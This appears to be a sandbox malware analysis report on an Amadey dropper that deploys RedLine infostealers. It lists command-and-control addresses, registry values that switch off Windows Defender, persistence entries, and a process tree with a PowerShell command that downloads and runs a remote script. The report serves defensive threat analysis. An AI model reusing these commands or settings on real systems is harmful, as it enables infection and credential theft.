amadey | 3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f

Analysis

max time kernel
150s
max time network
145s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
21-03-2023 00:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f.exe
Size

962KB
MD5

78c2c72e60412d3dc0dd1a54387e94a5
SHA1

a740b94d3f0063b69a6ac05638be7b7eacc95e1b
SHA256

3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f
SHA512

ebdcaa66c4a109c66dc0312a10f8ed5fbad2ffe7a16760b40ffa68c52a9421ff560dd1cb3ff08faab00fe5c1be7b9846ad56c0c2a7c64fe1adaf5356d1433b3e
SSDEEP

24576:SySEYrYTBvKSN+Cs/q3+OCJMrSMT14zZ:5jCY7rSzOCJCT2

Score

10^/10

amadey redline 14 gena vint discovery evasion infostealer persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.mdegmm.com/pdf/debug2.ps1

Extracted

Family

redline

Botnet

gena

193.233.20.30:4125

Attributes

auth_value
93c20961cb6b06b2d5781c212db6201e

Extracted

Family

redline

Botnet

vint

193.233.20.30:4125

Attributes

auth_value
fb8811912f8370b3d23bffda092d88d0

Extracted

Family

amadey

Version

3.68

62.204.41.87/joomla/index.php

Extracted

Family

redline

Botnet

45.12.253.144:40145

Attributes

auth_value
6528d0f243ad9e530a68f2a487521a80

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

RealtekAudio.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Realtek Audio.exe\","	RealtekAudio.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

tz5413.exev6574pF.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	tz5413.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	tz5413.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	v6574pF.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	tz5413.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	tz5413.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	tz5413.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	v6574pF.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	v6574pF.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	v6574pF.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	v6574pF.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 20 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4220-198-0x0000000002180000-0x00000000021C6000-memory.dmp	family_redline
behavioral1/memory/4220-199-0x0000000002660000-0x00000000026A4000-memory.dmp	family_redline
behavioral1/memory/4220-200-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-201-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-203-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-205-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-207-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-209-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-211-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-213-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-215-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-217-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-219-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-221-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-223-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-225-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-227-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-229-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-231-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline
behavioral1/memory/4220-233-0x0000000002660000-0x000000000269E000-memory.dmp	family_redline

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

34 4444 powershell.exe
35 3720 powershell.exe
36 4444 powershell.exe
37 3720 powershell.exe
Downloads MZ/PE file

flow	pid	process
34	4444	powershell.exe
35	3720	powershell.exe
36	4444	powershell.exe
37	3720	powershell.exe

Executes dropped EXE 17 IoCs

Processes:

zap7165.exezap8681.exezap3652.exetz5413.exev6574pF.exew52Kx61.exexJwTB01.exey71KE96.exelegenda.exeRealtekAudio.exeMelonServiceSupport_crypted.exeworld.exesqlcmd.exesqlcmd.exeRealtekAudio.exeRealtekAudio.exelegenda.exe

pid	process
5112	zap7165.exe
2100	zap8681.exe
4704	zap3652.exe
2864	tz5413.exe
4468	v6574pF.exe
4220	w52Kx61.exe
4100	xJwTB01.exe
4652	y71KE96.exe
4308	legenda.exe
820	RealtekAudio.exe
508	MelonServiceSupport_crypted.exe
3504	world.exe
2112	sqlcmd.exe
4980	sqlcmd.exe
4964	RealtekAudio.exe
4480	RealtekAudio.exe
4600	legenda.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2500 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2500	rundll32.exe

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

v6574pF.exetz5413.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	v6574pF.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	tz5413.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	v6574pF.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

zap8681.exezap3652.exe3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f.exezap7165.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	zap8681.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap3652.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	zap3652.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap7165.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	zap7165.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap8681.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 2 IoCs

Processes:

MelonServiceSupport_crypted.exeRealtekAudio.exe

description	pid	process	target process
PID 508 set thread context of 1768	508	MelonServiceSupport_crypted.exe	AppLaunch.exe
PID 820 set thread context of 4480	820	RealtekAudio.exe	RealtekAudio.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1824 508 WerFault.exe MelonServiceSupport_crypted.exe

pid	pid_target	process	target process
1824	508	WerFault.exe	MelonServiceSupport_crypted.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AppLaunch.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	AppLaunch.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3336 schtasks.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

4380 PING.EXE
5072 PING.EXE

pid	process
3336	schtasks.exe

pid	process
4380	PING.EXE
5072	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

tz5413.exev6574pF.exew52Kx61.exexJwTB01.exepowershell.exepowershell.exepowershell.exeworld.exeRealtekAudio.exe

pid	process
2864	tz5413.exe
2864	tz5413.exe
4468	v6574pF.exe
4468	v6574pF.exe
4220	w52Kx61.exe
4220	w52Kx61.exe
4100	xJwTB01.exe
4100	xJwTB01.exe
2400	powershell.exe
2400	powershell.exe
2400	powershell.exe
4444	powershell.exe
4444	powershell.exe
4444	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3504	world.exe
3504	world.exe
820	RealtekAudio.exe
820	RealtekAudio.exe
820	RealtekAudio.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

tz5413.exev6574pF.exew52Kx61.exexJwTB01.exeAppLaunch.exepowershell.exepowershell.exepowershell.exeworld.exeRealtekAudio.exeRealtekAudio.exe

description	pid	process
Token: SeDebugPrivilege	2864	tz5413.exe
Token: SeDebugPrivilege	4468	v6574pF.exe
Token: SeDebugPrivilege	4220	w52Kx61.exe
Token: SeDebugPrivilege	4100	xJwTB01.exe
Token: SeDebugPrivilege	1768	AppLaunch.exe
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeDebugPrivilege	3504	world.exe
Token: SeDebugPrivilege	820	RealtekAudio.exe
Token: SeDebugPrivilege	4480	RealtekAudio.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f.exezap7165.exezap8681.exezap3652.exey71KE96.exelegenda.execmd.exeMelonServiceSupport_crypted.exeRealtekAudio.exe

description	pid	process	target process
PID 4600 wrote to memory of 5112	4600	3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f.exe	zap7165.exe
PID 4600 wrote to memory of 5112	4600	3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f.exe	zap7165.exe
PID 4600 wrote to memory of 5112	4600	3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f.exe	zap7165.exe
PID 5112 wrote to memory of 2100	5112	zap7165.exe	zap8681.exe
PID 5112 wrote to memory of 2100	5112	zap7165.exe	zap8681.exe
PID 5112 wrote to memory of 2100	5112	zap7165.exe	zap8681.exe
PID 2100 wrote to memory of 4704	2100	zap8681.exe	zap3652.exe
PID 2100 wrote to memory of 4704	2100	zap8681.exe	zap3652.exe
PID 2100 wrote to memory of 4704	2100	zap8681.exe	zap3652.exe
PID 4704 wrote to memory of 2864	4704	zap3652.exe	tz5413.exe
PID 4704 wrote to memory of 2864	4704	zap3652.exe	tz5413.exe
PID 4704 wrote to memory of 4468	4704	zap3652.exe	v6574pF.exe
PID 4704 wrote to memory of 4468	4704	zap3652.exe	v6574pF.exe
PID 4704 wrote to memory of 4468	4704	zap3652.exe	v6574pF.exe
PID 2100 wrote to memory of 4220	2100	zap8681.exe	w52Kx61.exe
PID 2100 wrote to memory of 4220	2100	zap8681.exe	w52Kx61.exe
PID 2100 wrote to memory of 4220	2100	zap8681.exe	w52Kx61.exe
PID 5112 wrote to memory of 4100	5112	zap7165.exe	xJwTB01.exe
PID 5112 wrote to memory of 4100	5112	zap7165.exe	xJwTB01.exe
PID 5112 wrote to memory of 4100	5112	zap7165.exe	xJwTB01.exe
PID 4600 wrote to memory of 4652	4600	3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f.exe	y71KE96.exe
PID 4600 wrote to memory of 4652	4600	3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f.exe	y71KE96.exe
PID 4600 wrote to memory of 4652	4600	3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f.exe	y71KE96.exe
PID 4652 wrote to memory of 4308	4652	y71KE96.exe	legenda.exe
PID 4652 wrote to memory of 4308	4652	y71KE96.exe	legenda.exe
PID 4652 wrote to memory of 4308	4652	y71KE96.exe	legenda.exe
PID 4308 wrote to memory of 3336	4308	legenda.exe	schtasks.exe
PID 4308 wrote to memory of 3336	4308	legenda.exe	schtasks.exe
PID 4308 wrote to memory of 3336	4308	legenda.exe	schtasks.exe
PID 4308 wrote to memory of 4464	4308	legenda.exe	cmd.exe
PID 4308 wrote to memory of 4464	4308	legenda.exe	cmd.exe
PID 4308 wrote to memory of 4464	4308	legenda.exe	cmd.exe
PID 4464 wrote to memory of 3572	4464	cmd.exe	cmd.exe
PID 4464 wrote to memory of 3572	4464	cmd.exe	cmd.exe
PID 4464 wrote to memory of 3572	4464	cmd.exe	cmd.exe
PID 4464 wrote to memory of 2572	4464	cmd.exe	cacls.exe
PID 4464 wrote to memory of 2572	4464	cmd.exe	cacls.exe
PID 4464 wrote to memory of 2572	4464	cmd.exe	cacls.exe
PID 4464 wrote to memory of 4132	4464	cmd.exe	cacls.exe
PID 4464 wrote to memory of 4132	4464	cmd.exe	cacls.exe
PID 4464 wrote to memory of 4132	4464	cmd.exe	cacls.exe
PID 4464 wrote to memory of 5104	4464	cmd.exe	cmd.exe
PID 4464 wrote to memory of 5104	4464	cmd.exe	cmd.exe
PID 4464 wrote to memory of 5104	4464	cmd.exe	cmd.exe
PID 4464 wrote to memory of 5044	4464	cmd.exe	cacls.exe
PID 4464 wrote to memory of 5044	4464	cmd.exe	cacls.exe
PID 4464 wrote to memory of 5044	4464	cmd.exe	cacls.exe
PID 4464 wrote to memory of 3972	4464	cmd.exe	cacls.exe
PID 4464 wrote to memory of 3972	4464	cmd.exe	cacls.exe
PID 4464 wrote to memory of 3972	4464	cmd.exe	cacls.exe
PID 4308 wrote to memory of 820	4308	legenda.exe	RealtekAudio.exe
PID 4308 wrote to memory of 820	4308	legenda.exe	RealtekAudio.exe
PID 4308 wrote to memory of 820	4308	legenda.exe	RealtekAudio.exe
PID 4308 wrote to memory of 508	4308	legenda.exe	MelonServiceSupport_crypted.exe
PID 4308 wrote to memory of 508	4308	legenda.exe	MelonServiceSupport_crypted.exe
PID 4308 wrote to memory of 508	4308	legenda.exe	MelonServiceSupport_crypted.exe
PID 508 wrote to memory of 1768	508	MelonServiceSupport_crypted.exe	AppLaunch.exe
PID 508 wrote to memory of 1768	508	MelonServiceSupport_crypted.exe	AppLaunch.exe
PID 508 wrote to memory of 1768	508	MelonServiceSupport_crypted.exe	AppLaunch.exe
PID 508 wrote to memory of 1768	508	MelonServiceSupport_crypted.exe	AppLaunch.exe
PID 508 wrote to memory of 1768	508	MelonServiceSupport_crypted.exe	AppLaunch.exe
PID 820 wrote to memory of 2400	820	RealtekAudio.exe	powershell.exe
PID 820 wrote to memory of 2400	820	RealtekAudio.exe	powershell.exe
PID 820 wrote to memory of 2400	820	RealtekAudio.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f.exe
"C:\Users\Admin\AppData\Local\Temp\3870664bb0ac9edd0dbc5ea814fe200b3ea5f66c1997df6f2deb21024786d23f.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4600

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap7165.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap7165.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5112

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap8681.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap8681.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2100

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap3652.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap3652.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4704

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz5413.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz5413.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v6574pF.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v6574pF.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w52Kx61.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w52Kx61.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4220

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xJwTB01.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xJwTB01.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4100

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y71KE96.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y71KE96.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4652

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
"C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4308

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F
4⤵
- Creates scheduled task(s)
PID:3336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit
4⤵
- Suspicious use of WriteProcessMemory
PID:4464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:3572

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:N"
5⤵
PID:2572

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:R" /E
5⤵
PID:4132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:5104

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:N"
5⤵
PID:5044

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:R" /E
5⤵
PID:3972

C:\Users\Admin\AppData\Local\Temp\1000095001\RealtekAudio.exe
"C:\Users\Admin\AppData\Local\Temp\1000095001\RealtekAudio.exe"
4⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400

C:\Users\Admin\AppData\Local\Temp\1000095001\RealtekAudio.exe
C:\Users\Admin\AppData\Local\Temp\1000095001\RealtekAudio.exe
5⤵
- Executes dropped EXE
PID:4964

C:\Users\Admin\AppData\Local\Temp\1000095001\RealtekAudio.exe
C:\Users\Admin\AppData\Local\Temp\1000095001\RealtekAudio.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4480

C:\Users\Admin\AppData\Local\Temp\1000096001\MelonServiceSupport_crypted.exe
"C:\Users\Admin\AppData\Local\Temp\1000096001\MelonServiceSupport_crypted.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:508

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
5⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 576
5⤵
- Program crash
PID:1824

C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe
"C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3504

C:\Users\Admin\AppData\Local\Temp\1000098001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000098001\sqlcmd.exe"
4⤵
- Executes dropped EXE
PID:2112

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
PID:4796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4444

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000098001\sqlcmd.exe" >> NUL
5⤵
PID:4624

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:4380

C:\Users\Admin\AppData\Local\Temp\1000099001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000099001\sqlcmd.exe"
4⤵
- Executes dropped EXE
PID:4980

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
5⤵
PID:4616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000099001\sqlcmd.exe" >> NUL
5⤵
PID:4748

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:5072

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
4⤵
- Loads dropped DLL
PID:2500

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
- Executes dropped EXE
PID:4600

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Winlogon Helper DLL

T1004

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize
2KB

MD5
fc88b7748eb4cd37ae886a1c0813e4cf

SHA1
23e30b76fc94f0467a3efad342a91a3b84ff1eea

SHA256
3d81e317f8816680185517d7719e51fdbcd5807f9c629c4e3d0408820ec458da

SHA512
bb8ffaa2e8e581aa8d9a2e39b5f16c784d1431b4c18acc71b8fea84a4982d13a8ed1e5cf295c459ca35d8d4604c050210e0771386e7fe57d35c5ccd41fb92211

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize
1KB

MD5
cb684ec7fe8555f949182c7423dafdc2

SHA1
ec49f7b4b777fa1da40af5328785782127ffc52c

SHA256
8e17b090e2d07abf04860e961e601d8c663d3eaafd16190e6e6b6a4f018c0b0e

SHA512
ef627ca15ac143710b707ce28bd0cbe3447446db64c61f89d78f7c868cad07bd267563a7927ac4cd733adf2da3d58dcfadba54f8e0bc78e06d79cd389b77e500

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize
482B

MD5
7bec55a25e515df1881601500d382376

SHA1
6b6c9bc4ce5fb63afc2f54915aef22fd08d970dc

SHA256
af1bdec2a0c6258b817460d0ad1da5ec58b15db2ca4ba7f10d2fb441303c5478

SHA512
092f7dd5068826474f09c9641f6cc8d27f08c3d0bdc4482d1ae96f2f403961612ad106397f990edba17cb861187fa3a5046969ad6019ae56951db8f44f42a75a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize
486B

MD5
